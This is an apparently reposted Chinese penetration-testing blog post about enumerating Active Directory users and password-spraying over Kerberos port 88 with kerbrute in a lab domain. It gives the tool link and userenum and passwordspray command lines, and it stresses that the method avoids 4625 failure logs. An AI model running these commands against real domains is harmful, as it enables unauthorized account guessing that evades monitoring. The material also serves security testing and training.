Kerberos端口域用户枚举与密码喷洒

直播RTC机器学习

使用ldap协议爆破会产生大量日志(4625),使用Kerberos pre-auth不会产生日志,且适合无域内主机权限下进行爆破

环境

域控环境:

hacktest.com 10.211.55.3

picture.image

域内主机或者非域内主机都可以:10.211.55.6

picture.image

域控Kerberos 88端口开启:

picture.image

工具准备

https://github.com/ropnop/kerbrute/releases

准备字典:111.txt

picture.image

用户枚举


        
            

          kerbrute\_windows\_amd64.exe userenum -d hacktest.com 111.txt
        
      

picture.image

密码喷洒


        
            

          kerbrute\_windows\_amd64.exe passwordspray -d hacktest.com 111.txt 密码
        
      

picture.image

工具还有其他很多功能, 不一一探索了

picture.image

参考:https://www.cnblogs.com/backlion/p/13425035.html

       https://www.secshi.com/22082.html

        
            

          原文链接:https://blog.csdn.net/qq\_38376348/article/details/109062166?spm=1001.2101.3001.6650.3&utm\_medium=distribute.pc\_relevant.none-task-blog-2%7Edefault%7ECTRLIST%7Edefault-3.highlightwordscore&depth\_1-utm\_source=distribute.pc\_relevant.none-task-blog-2%7Edefault%7ECTRLIST%7Edefault-3.highlightwordscore
        
      

历史文章推荐:

XSS 实战思路总结

内网信息收集总结

xss攻击、绕过最全总结

一些webshell免杀的技巧

命令执行写webshell总结

SQL手工注入总结 必须收藏

后台getshell常用技巧总结

web渗透之发现内网有大鱼

蚁剑特征性信息修改简单过WAF

内网渗透之域渗透命令执行总结

[WEB安全]Weblogic漏洞总结

查看更多精彩内容,还请关注 橘猫学安全

每日坚持学习与分享,麻烦各位师傅文章底部给点个“ 再看 ”,感激不尽 picture.image

0
0
0
0
关于作者

文章

0

获赞

0

收藏

0

相关资源
大规模高性能计算集群优化实践
随着机器学习的发展,数据量和训练模型都有越来越大的趋势,这对基础设施有了更高的要求,包括硬件、网络架构等。本次分享主要介绍火山引擎支撑大规模高性能计算集群的架构和优化实践。
相关产品
评论
未登录
看完啦,登录分享一下感受吧~
暂无评论